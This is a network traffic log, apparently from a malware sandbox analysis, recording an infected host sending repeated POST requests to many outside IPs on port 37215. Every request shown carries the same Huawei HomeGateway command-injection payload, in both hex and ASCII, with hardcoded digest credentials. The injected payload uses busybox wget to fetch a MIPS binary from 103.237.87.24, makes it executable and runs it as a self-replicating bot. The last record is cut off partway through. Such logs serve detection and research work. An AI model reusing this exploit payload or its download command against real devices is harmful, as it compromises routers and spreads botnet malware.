                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  996192.168.2.1355314101.144.202.2437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.411580086 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  997192.168.2.1350238157.185.241.3637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.411613941 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  998192.168.2.1337148197.9.228.10337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.411730051 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  999192.168.2.135368841.55.42.9937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.411746979 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1000192.168.2.1347560157.43.142.9637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.411753893 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1001192.168.2.1339186197.225.39.12937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.411777973 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1002192.168.2.1347078157.207.5.15437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.411837101 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1003192.168.2.1344234197.132.122.12437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.411848068 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1004192.168.2.1348410157.44.7.4937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.411876917 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1005192.168.2.1351688197.216.219.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.411895037 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 